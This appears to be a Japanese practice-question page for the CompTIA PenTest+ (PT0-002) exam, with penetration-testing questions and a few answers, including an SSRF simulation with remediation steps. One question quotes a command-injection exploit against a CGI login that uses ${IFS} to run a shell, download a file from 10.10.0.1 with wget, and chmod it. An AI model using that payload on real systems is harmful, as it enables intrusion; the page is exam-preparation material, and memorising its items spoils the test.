次の認定試験に速く合格する!

簡単に認定試験を準備し、学び、そして合格するためにすべてが必要だ。

会員センター  カート (0)

PT0-002日本語 無料問題集「CompTIA PenTest+ Certification (PT0-002日本語版)」

ページ: 1 / 26
トータル 434 問
完全版を入手する
侵入テスターがファイル所有者によるシェル スクリプトの実行を許可できるようにするコマンドは、次のうちどれですか?

解説: (JPNTest メンバーにのみ表示されます)
侵入テスターは、クライアントの Web アプリケーションに対して複数の Nmap スキャンを実行します。
説明書
WAF とサーバーをクリックして、Nmap スキャンの結果を確認します。次に、各タブをクリックして、適切な脆弱性と修復オプションを選択します。
いつでもシミュレーションの初期状態に戻したい場合は、「すべてリセット」ボタンをクリックしてください。




正解:
See the explanation part for detailed solution.
Explanation:


Most likely vulnerability: Perform a SSRF attack against App01.example.com from CDN.example.com.
The scenario suggests that the CDN network (with a WAF) can be used to perform a Server-Side Request Forgery (SSRF) attack. Since the penetration tester has the pentester workstation interacting through the CDN/WAF and the production network is behind it, the most plausible attack vector is to exploit SSRF to interact with the internal services like App01.example.com.
Two best remediation options:
* Restrict direct communications to App01.example.com to only approved components.
* Require an additional authentication header value between CDN.example.com and App01.example.com.
* Restrict direct communications to App01.example.com to only approved components: This limits the exposure of the application server by ensuring that only specified, trusted entities can communicate with it.
* Require an additional authentication header value between CDN.example.com and App01.example.com: Adding an authentication layer between the CDN and the app server helps ensure that requests are legitimate and originate from trusted sources, mitigating SSRF and other indirect attack vectors.
Nmap Scan Observations:
* CDN/WAF shows open ports for HTTP and HTTPS but filtered for MySQL, indicating it acts as a filtering layer.
* App Server has open ports for HTTP, HTTPS, and filtered for MySQL.
* DB Server has all ports filtered, typical for a database server that should not be directly accessible.
These findings align with the SSRF vulnerability and the appropriate remediation steps to enhance the security of internal communications.
ペネトレーション テスターは、laaS コンピューティング インスタンスで実行されている Web アプリケーションのセキュリティをレビューしています。実行中のプロセスの認証情報を取得するためにテスターは次のペイロードのうちどれを送信する必要がありますか?

解説: (JPNTest メンバーにのみ表示されます)
侵入テスターが複数のスレッドを使用して SSH 経由でユーザー パスワードをブルート フォースするために使用できるツールは次のどれですか?

解説: (JPNTest メンバーにのみ表示されます)
侵入テストの最終レポートに含める最も重要な項目は次のうちどれですか?
(2つ選んでください。)

正解:C、D 解答を投票する
侵入テスターは、エクスプロイトを使用してシステムにアクセスすることができました。以下は、使用されたコードの一部です。
exploit = "POST "
exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -
c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS
&loginUser=a&Pwd=a"
exploit += "HTTP/1.1"
侵入テスターは、エンゲージメント後に次のコマンドのうちどれを実行する必要がありますか?

解説: (JPNTest メンバーにのみ表示されます)
自動車業界向けの組み込みソフトウェアを開発している会社は、製品の出荷前にセキュリティを評価するために侵入テスト チームを雇いました。侵入テスト チームは、バイナリを分析して概念実証のエクスプロイトを開発できるリバース エンジニアリング チームに委託する意向を表明しています。ソフトウェア会社は、下請け契約の承認に先立って、リバース エンジニアリング チームに追加の背景調査を依頼しました。次の懸念事項のうち、ソフトウェア会社の要求を最もよくサポートするものはどれですか?

ペネトレーション テスターは、Web アプリケーションとモバイル アプリケーションの両方を備えた組織の評価を実施しています。ユーザー プロファイル ページをテストしているときに、ペネトレーション テスターは、Web ユーザー インターフェイスには表示されない追加データが API 応答で返されることに気づきました。機密性の高いユーザー データを抽出する最も効果的な手法は次のうちどれですか?

解説: (JPNTest メンバーにのみ表示されます)
ペネトレーション テスターが、明示的な許可なしに、内部クライアント アプリケーションで見つかった新しい脆弱性に対して CVE 番号を割り当てるよう要求しました。ペネトレーションテスターが違反した可能性が最も高いのは次のうちどれですか?

解説: (JPNTest メンバーにのみ表示されます)
次の出力は、一般向けの銀行 Web サイトでの偵察からのものです。

これらの結果に基づいて、成功する可能性が最も高い攻撃は次のうちどれですか?

解説: (JPNTest メンバーにのみ表示されます)
侵入テスターは、従業員がスマートフォンでワイヤレス ヘッドセットを使用していることに気付きました。通信を傍受するために使用するのに最適な方法は次のうちどれですか?

解説: (JPNTest メンバーにのみ表示されます)
ある企業は、ネットワーク上でワイヤレス IDS を構成するためにペネトレーション テスターを採用しました。次のツールのうち、ワイヤレス IDS ソリューションの有効性をテストするのに最も適しているのはどれですか?

解説: (JPNTest メンバーにのみ表示されます)
脆弱性スキャン中に、侵入テスターはすべての非 Windows クライアントに対して次の Nmap コマンドを入力します。
nmap -sX -T4 -p 21-25、67、80、139、8080 192.168.11.191
ペネトレーション テスターは Wireshark でパケット キャプチャを確認し、ターゲットがすべてのターゲット ポートに設定された RST パケット フラグで応答していることに気付きます。この情報が示す可能性が最も高いのは次のうちどれですか?

解説: (JPNTest メンバーにのみ表示されます)
ある企業が侵入テスターを雇い、ネットワーク上に不正なアクセス ポイントを展開してセットアップしました。
この目標を達成するために使用するのに最適なツールは次のうちどれですか?

解説: (JPNTest メンバーにのみ表示されます)
会社から要求された評価を行っているペネトレーション テスターは、二重タグ付けを使用して別のシステムにトラフィックを送信したいと考えています。次のテクニックのうち、この目標を達成するのに最も適しているのはどれですか?

解説: (JPNTest メンバーにのみ表示されます)
アプリケーション開発者チームを対象読者として作成された静的アプリケーション セキュリティ テストの最終レポートに含めるのに最も重要なものは次のうちどれですか?

解説: (JPNTest メンバーにのみ表示されます)
赤いチームのテスターは、企業のネットワーク上の悪意のあるインサイダーによってもたらされる脅威をエミュレートするように契約されており、機密の個人ファイルにアクセスするという制約された目的があります。評価中に、レッドチームのテスターは、ターゲット環境内での以前の侵害の可能性を示すアーティファクトを特定します。
テスターが取るべきアクションは次のうちどれですか?

解説: (JPNTest メンバーにのみ表示されます)
ページ: 1 / 26
トータル 434 問

弊社を連絡する

我々は12時間以内ですべてのお問い合わせを答えます。

オンラインサポート時間:( UTC+9 ) 9:00-24:00
月曜日から土曜日まで

サポート:現在連絡 

関連リンク

トップ試験